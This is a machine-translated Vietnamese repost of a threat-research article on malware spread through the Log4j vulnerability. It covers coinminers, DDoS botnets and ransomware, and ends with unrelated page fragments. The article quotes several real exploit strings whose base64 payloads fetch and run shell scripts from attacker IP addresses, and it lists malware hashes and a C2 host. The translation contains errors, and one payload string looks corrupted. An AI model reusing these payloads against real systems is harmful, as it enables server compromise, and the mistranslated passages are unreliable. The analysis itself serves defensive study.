28
4
CFSDN nhấn mạnh vào việc tạo ra giá trị thông qua mã nguồn mở. Chúng tôi cam kết xây dựng một nền tảng chia sẻ tài nguyên để mọi người làm CNTT có thể tìm thấy thế giới tuyệt vời của riêng mình tại đây.
Bài đăng trên blog CFSDN này: Tác động sâu rộng của lỗ hổng Log4j được tác giả thu thập và sắp xếp. Nếu bạn quan tâm đến bài viết này, hãy nhớ thích nó.
Tuần trước, lỗ hổng Log4j đã làm đảo lộn toàn bộ Internet và gây ra hậu quả rất lớn. Những kẻ tấn công cũng đã bắt đầu khai thác lỗ hổng này và cho đến nay, các nhà nghiên cứu của Uptycs đã quan sát thấy các cuộc tấn công liên quan đến coinminer, phần mềm độc hại DDOS và một số biến thể ransomware đang tích cực khai thác lỗ hổng này.
Quy mô của các cuộc tấn công bằng phần mềm tống tiền có khả năng sẽ gia tăng trong những ngày tới. Vì lỗ hổng này rất nghiêm trọng nên có khả năng một số biến thể sẽ vượt qua được các bản vá hoặc bản sửa lỗi hiện tại. Việc liên tục theo dõi và tăng cường bảo vệ hệ thống để chống lại loại tấn công này là vô cùng quan trọng.
Uptycs trước đây đã chia sẻ thông tin chi tiết về các bước khắc phục và phát hiện cho khách hàng của mình trong một bài đăng trên blog. Bài viết cũng thảo luận về các loại phần mềm độc hại khác nhau mà kẻ tấn công sử dụng để khai thác lỗ hổng Log4j. Nhóm nghiên cứu mối đe dọa Uptycs đã xác định các loại tải trọng khác nhau được thả vào các máy chủ dễ bị tấn công. Các phần mềm độc hại bao gồm các phần mềm độc hại nổi tiếng như Kinsing và Xmrig coinminer, cũng như phần mềm độc hại botnet Dofloo, Tsunami và Mirai. Ngoài các nhóm phần mềm độc hại này, kẻ tấn công đã bắt đầu triển khai phần mềm tống tiền trên các máy chủ dễ bị tấn công bởi CVE-2021-44228.
Xmrig là một công cụ khai thác CPU Monero mã nguồn mở để khai thác tiền điện tử Monero. Sau khi kẻ tấn công khai thác lỗ hổng Log4j2, hắn đã cố gắng chạy một tập lệnh shell độc hại có chứa lệnh tải xuống trình khai thác xmrig.
Lệnh là 93.189.42 8[]:5557,/base/command/base64/encodedKGN1cmwgLXMgOTMuMTg5LjQyLjgvbGguc2h8fHdnZXQgLXEgLU8tIDkzLjE4OS40Mi44L2xoLnNoKXxiYXNo.
Lệnh này tải xuống tập lệnh shell khai thác/46bd3a99981688996224579db32c46af17f8d29a6c90401fb2f13e918469aff6 .
Tập lệnh shell (xem Hình 1) trước tiên sẽ tắt chương trình nhị phân khai thác đang chạy, sau đó tải xuống chương trình nhị phân khai thác xmrig từ Internet và chạy nó.
Hình 1: Tập lệnh shell tải xuống và thực thi Xmrig.
Kinsing là phần mềm độc hại khai thác tiền điện tử tự lan truyền, trước đây nhắm vào các cổng API Docker Daemon mở được cấu hình sai. Phần mềm độc hại Kinsing được viết bằng Golang và thường được phát tán thông qua các tập lệnh shell độc hại. Tập lệnh shell kinsing bao gồm một số kỹ thuật né tránh phòng thủ, chẳng hạn như sử dụng setfacl, sử dụng chattr, lệnh xóa nhật ký, v.v.
Sau khi quét toàn diện, kẻ tấn công đã cố gắng đặt mã nhị phân Kinsing vào máy chủ dễ bị tấn công. Kẻ tấn công sử dụng URL để thả và chạy tập lệnh shell là: 92.242.40[.]21:5557,/Basic/Command/Base64/KGN1cmwgLXMgOTIuMjQyLjQwLjIxL2xoLnNofHx3Z2V0IC1xIC1PLSA5NDAGugc2gEg2gEg2gEg2.
Trong tập lệnh shell: 7e9663f87255ae2ff78eb882efe8736431368f341849fec000543f027bdb4512), chúng ta có thể thấy rằng kẻ tấn công đã đặt lệnh xóa nhị phân phần mềm độc hại kinsing khi tập lệnh shell được chạy (xem Hình 2).
Hình 2: Tải xuống Kinsing thông qua tập lệnh shell.
Tập lệnh shell kinsing cũng chứa các lệnh liên quan đến docker để tắt tiến trình khai thác đang chạy trên hệ thống nạn nhân (nếu có).
Hình 3: Lệnh docker để tắt một trình khai thác đang chạy.
Trong một số nỗ lực khai thác, kẻ tấn công đã cố gắng thả các tệp nhị phân phần mềm độc hại từ chối dịch vụ phân tán (DDoS) như dofloo, Mirai.
Dofloo (còn được gọi là AeSDdos, flooder) là phần mềm độc hại kiểu DDoS có thể thực hiện nhiều cuộc tấn công tràn ngập vào các địa chỉ IP mục tiêu, chẳng hạn như ICMP và TCP. Ngoài cuộc tấn công tràn ngập, Dofloo còn đảm bảo tính bền bỉ của nó bằng cách thao túng tệp rc.local trên hệ thống của nạn nhân. Một số biến thể của nó triển khai trình khai thác tiền điện tử trên máy tính của nạn nhân.
Trong các hệ thống tình báo, kẻ tấn công cũng phát tán phần mềm độc hại Dofloo sau khi khai thác các máy chủ dễ bị tấn công. Lệnh đầy đủ được kẻ tấn công sử dụng là 81.30.157 43[]:1389,/base/command/base64/d2dldCBodHRwOi8vMTU1Ljk0LjE1NC4xNzAvYWFhO2N1cmwgLU8gaHR0cDovLzE1NS45NC4xNTQuMTcwL2FhYTtjaG1vZCA3NzcgYWFhOy4vYWFh. Hình ảnh sau đây (xem Hình 4) cho thấy thao tác của Dofloo đối với rc.local: 6e8f2da2a4facc2011522dbcdacA509195bfbdb84dbdc840382b9c40d7975548) Một biến thể được sử dụng trong Log4j sau khi khai thác.
Hình 4: Dofloo đang thao tác với rc.local.
Tsunami (còn được gọi là mushtik) là phần mềm độc hại đa nền tảng dựa trên DDoSflooder, thực thi các lệnh shell trên hệ thống bị nhiễm trong quá trình tải xuống. Mẫu sóng thần: 4c97321bcd291d2ca82c68b02cde465371083dace28502b7eb3a88558d7e190c) sử dụng crontab để duy trì. Ngoài tính bền bỉ, nó còn xóa một bản sao của thư mục /dev/shm/ như một chiến lược phòng thủ (xem Hình 5).
Hình 5: Tsunami được chạy từ /dev/shm thông qua cron.
Mirai là phần mềm độc hại lây nhiễm các thiết bị thông minh chạy trên bộ xử lý ARC, biến chúng thành mạng lưới robot điều khiển từ xa. Mirai cũng được phát tán thông qua các tập lệnh shell độc hại. Lệnh được kẻ tấn công sử dụng là 45.137.21[.]9:1389,/Basic/Command/Base64/d2dldCAtcSAtTy0gaHR0cDovLzYyLjIxMC4xMzAuMjUwL2xoLnNofGJhc2g=. Lệnh này sử dụng tiện ích wget để xóa phần mềm độc hại Mirai khỏi C2, 62.210.130[.]250 của kẻ tấn công (xem Hình 6).
Hình 6: Tập lệnh shell để tải xuống mirai từ C2.
Kẻ tấn công cũng khai thác lỗ hổng Log4j để phát tán phần mềm tống tiền Linux vào các máy chủ dễ bị tấn công. Kẻ tấn công cố gắng phát tán phần mềm tống tiền Linux sau khi khai thác lỗ hổng Log4j: 5c8710638fad8eeac382b0323461892a3e1a8865da3625403769a4378622077e. Phần mềm tống tiền này được viết bằng golang và thao túng các tệp ssh để lây lan trong hệ thống của nạn nhân. Nội dung yêu cầu tiền chuộc do kẻ tấn công gửi được hiển thị bên dưới (xem Hình 7).
Hình 7: Ghi chú tiền chuộc của Linux.
Uptycs EDR đã phát hiện thành công tất cả các tải trọng bằng cách sử dụng các quy tắc hành vi được ánh xạ tới các quy trình quét MITRE ATT&CK và YARA. Một ví dụ về phần mềm tống tiền Linux được phát hiện chủ động theo các quy tắc hành vi của chúng tôi được hiển thị bên dưới (xem Hình 8).
Hình 8: Phát hiện phần mềm tống tiền bằng Uptycs EDR.
Ngoài các quy tắc về hành vi, khi phát hiện YARA được kích hoạt, Uptycs EDR sẽ chỉ định hồ sơ mối đe dọa thông qua các quy tắc YARA do nhóm nghiên cứu mối đe dọa biên soạn. Người dùng có thể điều hướng đến phần Dữ liệu bộ dụng cụ trong cảnh báo phát hiện và nhấp vào tên để tìm mô tả về bộ dụng cụ. Một đoạn trích về hoạt động phần mềm độc hại Xmrig được Uptycs EDR phát hiện được hiển thị bên dưới (xem Hình 9).
Hình 9: Phát hiện XMrig bằng Uptycs EDR.
Liên kết gốc: https://t.cj.sina.com.cn/articles/view/5095232218/12fb312da0190120w6.
Cuối cùng, bài viết này về Inventory: The far-reaching impact of Log4j vulnerability đã có tại đây. Nếu bạn muốn biết thêm về Inventory: The far-reaching impact of Log4j vulnerability, vui lòng tìm kiếm các bài viết CFSDN hoặc tiếp tục duyệt các bài viết liên quan. Tôi hy vọng bạn sẽ ủng hộ blog của tôi trong tương lai! .
28
4
0
Trong một cuộc họp, giám đốc kỹ thuật của Hiệp hội đấu thầu và đấu thầu Trung Quốc thực sự đã nói trước mặt nhiều nhà lãnh đạo rằng .NET không thể chạy trên máy chủ trong nước. Có thể nói rằng giám đốc kỹ thuật này hoặc là ngu ngốc hoặc là tệ. Kiến trúc bộ xử lý của máy chủ trong nước chủ yếu bao gồm x86, ARM, LoongArch, risc
USENIX Security là một trong bốn hội nghị học thuật hàng đầu trong lĩnh vực an ninh mạng và điện toán bảo mật được quốc tế công nhận và là hội nghị hạng A được CCF (Liên đoàn máy tính Trung Quốc) khuyến nghị. Bảo mật USENIX
Tuần trước, lỗ hổng Log4j đã làm đảo lộn toàn bộ Internet và gây ra hậu quả rất lớn. Những kẻ tấn công cũng đã bắt đầu khai thác lỗ hổng này. Cho đến nay, các nhà nghiên cứu của Uptycs đã quan sát thấy các cuộc tấn công liên quan đến coinminer, phần mềm độc hại DDOS và một số biến thể ransomware.
Trung tâm cá nhân
Bài viết phát hành
từ bỏ
Tôi là một lập trình viên xuất sắc, rất giỏi!